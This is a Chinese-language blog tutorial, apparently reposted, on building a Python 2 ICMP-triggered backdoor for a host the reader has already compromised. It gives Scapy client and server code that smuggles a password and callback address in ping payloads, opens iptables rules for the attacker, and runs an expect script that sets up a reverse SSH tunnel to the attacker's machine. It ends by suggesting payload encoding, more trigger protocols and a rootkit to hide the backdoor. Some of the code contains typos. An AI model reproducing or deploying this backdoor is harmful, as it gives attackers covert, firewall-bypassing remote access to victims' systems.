python能做cs程序吗_用Python编写一个简单的CS架构后门的方法

0x00:事先说明

你已经攻陷了对方主机且获得了最高权限。

对方的本地防火墙会丢弃所有的外来数据包。

这个后门不会仅绑定在某一个端口上。

这段代码很容易写,毕竟是 Python(准确说是 Python 2.x)。

0x01:工作原理

20181120113226028.png?20181020113237

如你所见,客户端将伪造具有 ICMP 负载的特定数据包,另一方面在服务端,也就是我们的被攻击主机,将会接受我们发送的数据包,即使它开启了本地的防火墙(丢弃所有外来数据包)。关键在于无线网卡的监听模式,它无需和 AP 建立连接却可以和接受所有流经空气的数据包。

我们会用到一个有用的第三方包 Scapy。这是它的官方文档。如果你是第一次使用,不妨参考这篇文章,也许会有帮助。

0x02:客户端代码

'''

客户端代码。将服务端的 IP 地址、客户端的 IP 地址、客户端的连接端口,以及连接所需密码作为程序输入。如果成功返回一个交互式后门,在代码硬编码好的位置写入日志文件信息。

'''

#! /usr/bin/env python

import logging

import socket

from scapy.all import *

import os

import os.path

import sys

import time

logging.getLongger("scapy.runtime").setLevel(loggin.ERROR)

file_result = "/tmp/done"

if len(sys.argv) != 5:

print "usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + “ PASSWORD_CLIENT ”

sys.exit(1)

server = sys.argv[1]

if os.path.isfile(file_result):

os.remove(file_result)

load = sys.argv[2] + "|" + sys.argv[3] + "|" + sys.argv[4]

pingr = IP(dst = server) / ICMP() / load

send(pingr, verbose = 0) # send() 函数工作在协议栈的第三层(网络层)

0x04:服务端代码

服务端代码分为两块:1. 主要脚本部分、2. ssh 隧道部分。

'''

服务端代码之主要脚本部分。这个脚本会监听 ICMP 数据包并从句法上分析其携带的数据部分(客户端 IP 地址、客户端连接端口、连接所需密码)。接着在本地打开两个新的防火墙规则。最后调用另一个 expect 脚本,以建立和客户端之间稳定的 ssh 连接。

'''

#! /usr/bin/env python

import logging

import socket

from scapy.all import *

import re

import subprocess # py2.4 新增模块,允许用户编写代码生成新进程,连接到它们的 input/output/error 管道,并获取它们的返回/状态码。

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

def icmp_monitor_callback(pkt):

reg = re.compile("(.*)\|(.*)\|(.*)")

g = reg.match(pkt.load)

if g:

subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT'])

subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT'])

p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)])

return

sniff(prn=icmp_monitor_callback, filter="icmp", store=0) # scapy.sniff() 函数会嗅探来自空气中的数据包,prn 参数用来指定回调函数,每当符合 filter 的报文被探测到时,就会执行回调函数。有关该函数的详细信息,可以参考这篇博客:https://thepacketgeek.com/scapy-sniffing-with-custom-actions-part-1/

'''

服务端代码之 ssh 隧道部分,实际上是一个简单的 expect 脚本。接受嗅探到的客户端 IP 地址、客户端端口,以及用于连接的密码作为输入。

'''

#!/usr/bin/expect -f

set ip [lindex $argv 0];

set port [lindex $argv 1];

set password [lindex $argv 2];

spawn ssh -o StrictHostKeyChecking=no -R 19999:localhost:$port $ip

expect "*?assword:*"

send "$password\r"

expect "*#"

send "touch /tmp/done\r"

interact

0x05:文末思考

上面完成的后门代码待完善的地方。

ICMP payload 应该被编码。

添加其他的协议用来唤醒该后门(如 http、特定的 syn 包、dns 等)。

写一个 rootkit,隐藏该后门,猥琐欲为。此乃后话。

有关 rootkit 的延伸阅读。

https://www.jb51.net/article/151111.htm

https://null-byte.wonderhowto.com/how-to/writing-windows-10-rootkit-part-1-0165781/

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对我们的支持。如果你想了解更多相关内容请查看下面相关链接

本文标题: 用Python编写一个简单的CS架构后门的方法

本文地址: http://www.cppcns.com/jiaoben/python/245180.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值